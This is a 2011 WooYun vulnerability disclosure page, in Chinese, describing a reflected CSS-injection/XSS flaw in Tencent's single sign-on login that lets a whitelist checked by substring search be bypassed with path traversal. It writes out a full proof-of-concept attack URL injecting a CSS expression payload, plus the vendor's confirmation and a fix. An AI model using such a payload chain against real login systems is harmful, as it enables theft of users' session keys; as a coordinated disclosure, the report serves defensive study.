当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(6) 关注此漏洞

缺陷编号: WooYun-2011-02203

漏洞标题: 腾讯单点登录系统CSS样式表注入漏洞

相关厂商: 腾讯

漏洞作者: rayh4c

提交时间: 2011-06-01

公开时间: 2011-07-01

漏洞类型: xss跨站脚本攻击

危害等级: 中

自评Rank: 10

漏洞状态: 厂商已经确认

漏洞来源: http://www.wooyun.org

Tags标签: 反射型xss

漏洞详情

披露状态:

2011-06-01: 细节已通知厂商并且等待厂商处理中
2011-06-01: 厂商已经确认,细节仅向厂商公开
2011-06-11: 细节向核心白帽子及相关领域专家公开
2011-06-21: 细节向普通白帽子公开
2011-07-01: 细节向实习白帽子公开
2011-07-16: 细节向公众公开

简要描述:

腾讯单点登录系统存在一个CSS样式表漏洞,导致可以注入脚本劫持使用单点登陆插件盗取用户的clientkey使用QQ服务.

详细说明:

腾讯单点登录系统有个CSS参数可以导入远程的样式表,CSS样式表URL有个白名单列表,开发人员只通过字符串搜索的方式匹配白名单,导致可以饶过该白名单限制.

漏洞证明:

如http://pengyou.qq.com/asset/login.css是白名单

那么通过一个搜索功能我们就能输出一段CSS样式表

http://pengyou.qq.com/asset/out.php?mod=outsearch&act=result&name=}body{x:expression(alert(1))}

由于开发人员只通过字符串搜索的方式匹配白名单URL,我们可以通过目录跳转符的方式访问CSS样式表链接
http://pengyou.qq.com/asset/login.css/../../out.php?mod=outsearch&act=result&name=}body{x:expression(alert(1))}

最后生成攻击链接
http://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=2&jumpname=&ptcss=&param=&css=http%3a%2f%2fpengyou.qq.com%2fasset%2flogin.css%2f..%2f..%2fout.php%3fmod%3doutsearch%26act%3dresult%26name%3d%7dbody%7bx%3aexpression(alert(1))%7d

修复方案:

严格匹配白名单,而不是通过字符串搜索的方式匹配白名单.

版权声明:转载请注明来源 rayh4c@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2011-06-01

厂商回复:

thx

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评论

  1. 2011-06-05 17:07 | 蚊虫 ( 普通白帽子 | Rank:36 漏洞数:12 | 我装逼这么牛可还是没妞喜欢我)
    0

    注入脚本劫持....听起来很爽..

    回复此人
  2. 2011-07-01 18:43 | 晴天小铸 ( 普通白帽子 | Rank:106 漏洞数:31 | 退出黑客界的纠纷,低调求发展。)
    0

    第一次 看到CSS 跨目录

    回复此人
  3. 2011-07-02 09:46 | 1cefish ( 普通白帽子 | Rank:47 漏洞数:10 | 作为一个到处漂泊了5年的SB 表示黑客无处不...)
    0

    CSS跨目录,牛B啊 脚本注入~~~

    回复此人

登录后才能发表评论,请先 登录

Copyright © 2010 www.wooyun.org All Rights Reserved. 沪ICP备11033592号-1